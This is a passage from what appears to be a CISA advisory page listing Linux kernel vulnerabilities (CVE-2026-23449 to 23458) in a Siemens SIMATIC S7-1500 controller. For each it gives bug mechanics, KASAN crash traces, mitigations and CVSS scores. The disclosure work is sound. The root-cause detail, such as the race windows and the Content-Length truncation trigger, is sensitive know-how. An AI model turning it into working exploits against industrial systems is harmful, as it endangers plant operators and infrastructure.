(net/core/skbuff.c:1256) [ 238.030032][ T318] pfifo_fast_reset (./include/linux/ptr_ring.h:171 ./include/linux/ptr_ring.h:309 ./include/linux/skb_array.h:98 net/sched/sch_generic.c:827) [ 238.030039][ T318] ? srso_alias_return_thunk (arch/x86/lib/retpoline.S:221) ... [ 238.030054][ T318] qdisc_reset (net/sched/sch_generic.c:1034) [ 238.030062][ T318] teql_destroy (./include/linux/spinlock.h:395 net/sched/sch_teql.c:157) [ 238.030071][ T318] __qdisc_destroy (./include/net/pkt_sched.h:328 net/sched/sch_generic.c:1077) [ 238.030077][ T318] qdisc_graft (net/sched/sch_api.c:1062 net/sched/sch_api.c:1053 net/sched/sch_api.c:1159) [ 238.030089][ T318] ? __pfx_qdisc_graft (net/sched/sch_api.c:1091) [ 238.030095][ T318] ? srso_alias_return_thunk (arch/x86/lib/retpoline.S:221) [ 238.030102][ T318] ? srso_alias_return_thunk (arch/x86/lib/retpoline.S:221) [ 238.030106][ T318] ? srso_alias_return_thunk (arch/x86/lib/retpoline.S:221) [ 238.030114][ T318] tc_get_qdisc (net/sched/sch_api.c:1529 net/sched/sch_api.c:1556) ... [ 238.072958][ T318] Allocated by task 303 on cpu 5 at 238.026275s: [ 238.073392][ T318] kasan_save_stack (mm/kasan/common.c:58) [ 238.073884][ T318] kasan_save_track (mm/kasan/common.c:64 (discriminator 5) mm/kasan/common.c:79 (discriminator 5)) [ 238.074230][ T318] __kasan_slab_alloc (mm/kasan/common.c:369) [ 238.074578][ T318] kmem_cache_alloc_node_noprof (./include/linux/kasan.h:253 mm/slub.c:4542 mm/slub.c:4869 mm/slub.c:4921) [ 238.076091][ T318] kmalloc_reserve (net/core/skbuff.c:616 (discriminator 107)) [ 238.076450][ T318] __alloc_skb (net/core/skbuff.c:713) [ 238.076834][ T318] alloc_skb_with_frags (./include/linux/skbuff.h:1383 net/core/skbuff.c:6763) [ 238.077178][ T318] sock_alloc_send_pskb (net/core/sock.c:2997) [ 238.077520][ T318] packet_sendmsg (net/packet/af_packet.c:2926 net/packet/af_packet.c:3019 net/packet/af_packet.c:3108) [ 238.081469][ T318] [ 238.081870][ T318] Freed by task 299 on cpu 1 at 238.028496s: [ 238.082761][ T318] kasan_save_stack (mm/kasan/common.c:58) [ 238.083481][ T318] kasan_save_track (mm/kasan/common.c:64 (discriminator 5) mm/kasan/common.c:79 (discriminator 5)) [ 238.085348][ T318] kasan_save_free_info (mm/kasan/generic.c:587 (discriminator 1)) [ 238.085900][ T318] __kasan_slab_free (mm/ ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23449">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/367.html">CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23450</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/smc: fix NULL dereference and UAF in smc_tcp_syn_recv_sock() Syzkaller reported a panic in smc_tcp_syn_recv_sock() [1]. smc_tcp_syn_recv_sock() is called in the TCP receive path (softirq) via icsk_af_ops-&gt;syn_recv_sock on the clcsock (TCP listening socket). It reads sk_user_data to get the smc_sock pointer. However, when the SMC listen socket is being closed concurrently, smc_close_active() sets clcsock-&gt;sk_user_data to NULL under sk_callback_lock, and then the smc_sock itself can be freed via sock_put() in smc_release(). This leads to two issues: 1) NULL pointer dereference: sk_user_data is NULL when accessed. 2) Use-after-free: sk_user_data is read as non-NULL, but the smc_sock is freed before its fields (e.g., queued_smc_hs, ori_af_ops) are accessed. The race window looks like this (the syzkaller crash [1] triggers via the SYN cookie path: tcp_get_cookie_sock() -&gt; smc_tcp_syn_recv_sock(), but the normal tcp_check_req() path has the same race): CPU A (softirq) CPU B (process ctx) tcp_v4_rcv() TCP_NEW_SYN_RECV: sk = req-&gt;rsk_listener sock_hold(sk) /* No lock on listener */ smc_close_active(): write_lock_bh(cb_lock) sk_user_data = NULL write_unlock_bh(cb_lock) ... smc_clcsock_release() sock_put(smc-&gt;sk) x2 -&gt; smc_sock freed! tcp_check_req() smc_tcp_syn_recv_sock(): smc = user_data(sk) -&gt; NULL or dangling smc-&gt;queued_smc_hs -&gt; crash! Note that the clcsock and smc_sock are two independent objects with separate refcounts. TCP stack holds a reference on the clcsock, which keeps it alive, but this does NOT prevent the smc_sock from being freed. Fix this by using RCU and refcount_inc_not_zero() to safely access smc_sock. Since smc_tcp_syn_recv_sock() is called in the TCP three-way handshake path, taking read_lock_bh on sk_callback_lock is too heavy and would not survive a SYN flood attack. Using rcu_read_lock() is much more lightweight. - Set SOCK_RCU_FREE on the SMC listen socket so that smc_sock freeing is deferred until after the RCU grace period. This guarantees the memory is still valid when accessed inside rcu_read_lock(). - Use rcu_read_lock() to protect reading sk_user_data. - Use refcount_inc_not_zero(&amp;smc-&gt;sk.sk_refcnt) to pin the smc_sock. If the refcount has already reached zero (close path completed), it returns false and we bail out safely. Note: smc_hs_congested() has a similar lockless read of sk_user_data without rcu_read_lock(), but it only checks for NULL and accesses the global smc_hs_wq, never dereferencing any smc_sock field, so it is not affected. Reproducer was verified with mdelay injection and smc_run, the issue no longer occurs with this patch applied. [1] https://syzkaller.appspot.com/bug?extid=827ae2bfb3a3529333e9</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23450">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23452</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: PM: runtime: Fix a race condition related to device removal The following code in pm_runtime_work() may dereference the dev-&gt;parent pointer after the parent device has been freed: /* Maybe the parent is now able to suspend. */ if (parent &amp;&amp; !parent-&gt;power.ignore_children) { spin_unlock(&amp;dev-&gt;power.lock); spin_lock(&amp;parent-&gt;power.lock); rpm_idle(parent, RPM_ASYNC); spin_unlock(&amp;parent-&gt;power.lock); spin_lock(&amp;dev-&gt;power.lock); } Fix this by inserting a flush_work() call in pm_runtime_remove(). Without this patch blktest block/001 triggers the following complaint sporadically: BUG: KASAN: slab-use-after-free in lock_acquire+0x70/0x160 Read of size 1 at addr ffff88812bef7198 by task kworker/u553:1/3081 Workqueue: pm pm_runtime_work Call Trace: dump_stack_lvl+0x61/0x80 print_address_description.constprop.0+0x8b/0x310 print_report+0xfd/0x1d7 kasan_report+0xd8/0x1d0 __kasan_check_byte+0x42/0x60 lock_acquire.part.0+0x38/0x230 lock_acquire+0x70/0x160 _raw_spin_lock+0x36/0x50 rpm_suspend+0xc6a/0xfe0 rpm_idle+0x578/0x770 pm_runtime_work+0xee/0x120 process_one_work+0xde3/0x1410 worker_thread+0x5eb/0xfe0 kthread+0x37b/0x480 ret_from_fork+0x6cb/0x920 ret_from_fork_asm+0x11/0x20 Allocated by task 4314: kasan_save_stack+0x2a/0x50 kasan_save_track+0x18/0x40 kasan_save_alloc_info+0x3d/0x50 __kasan_kmalloc+0xa0/0xb0 __kmalloc_noprof+0x311/0x990 scsi_alloc_target+0x122/0xb60 [scsi_mod] __scsi_scan_target+0x101/0x460 [scsi_mod] scsi_scan_channel+0x179/0x1c0 [scsi_mod] scsi_scan_host_selected+0x259/0x2d0 [scsi_mod] store_scan+0x2d2/0x390 [scsi_mod] dev_attr_store+0x43/0x80 sysfs_kf_write+0xde/0x140 kernfs_fop_write_iter+0x3ef/0x670 vfs_write+0x506/0x1470 ksys_write+0xfd/0x230 __x64_sys_write+0x76/0xc0 x64_sys_call+0x213/0x1810 do_syscall_64+0xee/0xfc0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 Freed by task 4314: kasan_save_stack+0x2a/0x50 kasan_save_track+0x18/0x40 kasan_save_free_info+0x3f/0x50 __kasan_slab_free+0x67/0x80 kfree+0x225/0x6c0 scsi_target_dev_release+0x3d/0x60 [scsi_mod] device_release+0xa3/0x220 kobject_cleanup+0x105/0x3a0 kobject_put+0x72/0xd0 put_device+0x17/0x20 scsi_device_dev_release+0xacf/0x12c0 [scsi_mod] device_release+0xa3/0x220 kobject_cleanup+0x105/0x3a0 kobject_put+0x72/0xd0 put_device+0x17/0x20 scsi_device_put+0x7f/0xc0 [scsi_mod] sdev_store_delete+0xa5/0x120 [scsi_mod] dev_attr_store+0x43/0x80 sysfs_kf_write+0xde/0x140 kernfs_fop_write_iter+0x3ef/0x670 vfs_write+0x506/0x1470 ksys_write+0xfd/0x230 __x64_sys_write+0x76/0xc0 x64_sys_call+0x213/0x1810</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23452">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/364.html">CWE-364 Signal Handler Race Condition</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23454</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: mana: fix use-after-free in mana_hwc_destroy_channel() by reordering teardown A potential race condition exists in mana_hwc_destroy_channel() where hwc-&gt;caller_ctx is freed before the HWC's Completion Queue (CQ) and Event Queue (EQ) are destroyed. This allows an in-flight CQ interrupt handler to dereference freed memory, leading to a use-after-free or NULL pointer dereference in mana_hwc_handle_resp(). mana_smc_teardown_hwc() signals the hardware to stop but does not synchronize against IRQ handlers already executing on other CPUs. The IRQ synchronization only happens in mana_hwc_destroy_cq() via mana_gd_destroy_eq() -&gt; mana_gd_deregister_irq(). Since this runs after kfree(hwc-&gt;caller_ctx), a concurrent mana_hwc_rx_event_handler() can dereference freed caller_ctx (and rxq-&gt;msg_buf) in mana_hwc_handle_resp(). Fix this by reordering teardown to reverse-of-creation order: destroy the TX/RX work queues and CQ/EQ before freeing hwc-&gt;caller_ctx. This ensures all in-flight interrupt handlers complete before the memory they access is freed.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23454">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23455</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conntrack_h323: check for zero length in DecodeQ931() In DecodeQ931(), the UserUserIE code path reads a 16-bit length from the packet, then decrements it by 1 to skip the protocol discriminator byte before passing it to DecodeH323_UserInformation(). If the encoded length is 0, the decrement wraps to -1, which is then passed as a large value to the decoder, leading to an out-of-bounds read. Add a check to ensure len is positive after the decrement.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23455">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.1</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23456</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conntrack_h323: fix OOB read in decode_int() CONS case In decode_int(), the CONS case calls get_bits(bs, 2) to read a length value, then calls get_uint(bs, len) without checking that len bytes remain in the buffer. The existing boundary check only validates the 2 bits for get_bits(), not the subsequent 1-4 bytes that get_uint() reads. This allows a malformed H.323/RAS packet to cause a 1-4 byte slab-out-of-bounds read. Add a boundary check for len bytes after get_bits() and before get_uint().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23456">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.2</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23457</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conntrack_sip: fix Content-Length u32 truncation in sip_help_tcp() sip_help_tcp() parses the SIP Content-Length header with simple_strtoul(), which returns unsigned long, but stores the result in unsigned int clen. On 64-bit systems, values exceeding UINT_MAX are silently truncated before computing the SIP message boundary. For example, Content-Length 4294967328 (2^32 + 32) is truncated to 32, causing the parser to miscalculate where the current message ends. The loop then treats trailing data in the TCP segment as a second SIP message and processes it through the SDP parser. Fix this by changing clen to unsigned long to match the return type of simple_strtoul(), and reject Content-Length values that exceed the remaining TCP payload length.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23457">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/681.html">CWE-681 Incorrect Conversion between Numeric Types</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.6</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23458</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: ctnetlink: fix use-after-free in ctnetlink_dump_exp_ct() ctnetlink_dump_exp_ct() stores a conntrack pointer in cb-&gt;data for the netlink dump callback ctnetlink_exp_ct_dump_table(), but drops the conntrack reference immediately after netlink_dump_start(). When the dump spans multiple rounds, the second recvmsg() triggers the dump callback which dereferences the now-freed conntrack via nfct_help(ct), leading to a use-after-free on ct-&gt;ext. The bug is that the netlink_dump_control has no .start or .done callbacks to manage the conntrack reference across dump rounds. Other dump functions in the same file (e.g. ctnetlink_get_conntrack) properly use .start/.done callbacks for this purpose. Fix this by adding .start and .done callbacks that hold and release the conntrack reference for the duration of the dump, and move the nfct_help() call after the cb-&gt;args[0] early-return check in the dump callback to avoid dereferencing ct-&gt;ext unnecessarily. BUG: KASAN: slab-use-after-free in ctnetlink_exp_ct_dump_table+0x4f/0x2e0 Read of size 8 at addr ffff88810597ebf0 by task ctnetlink_poc/133 CPU: 1 UID: 0 PID: 133 Comm: ctnetlink_poc Not tainted 7.0.0-rc2+ #3 PREEMPTLAZY Call Trace: ctnetlink_exp_ct_dump_table+0x4f/0x2e0 netlink_dump+0x333/0x880 netlink_recvmsg+0x3e2/0x4b0 ? aa_sk_perm+0x184/0x450 sock_recvmsg+0xde/0xf0 Allocated by task 133: kmem_cache_alloc_noprof+0x134/0x440 __nf_conntrack_alloc+0xa8/0x2b0 ctnetlink_create_conntrack+0xa1/0x900 ctnetlink_new_conntrack+0x3cf/0x7d0 nfnetlink_rcv_msg+0x48e/0x510 netlink_rcv_skb+0xc9/0x1f0 nfnetlink_rcv+0xdb/0x220 netlink_unicast+0x3ec/0x590 netlink_sendmsg+0x397/0x690 __sys_sendmsg+0xf4/0x180 Freed by task 0: slab_free_after_rcu_debug+0xad/0x1e0 rcu_core+0x5c3/0x9c0</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23458">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
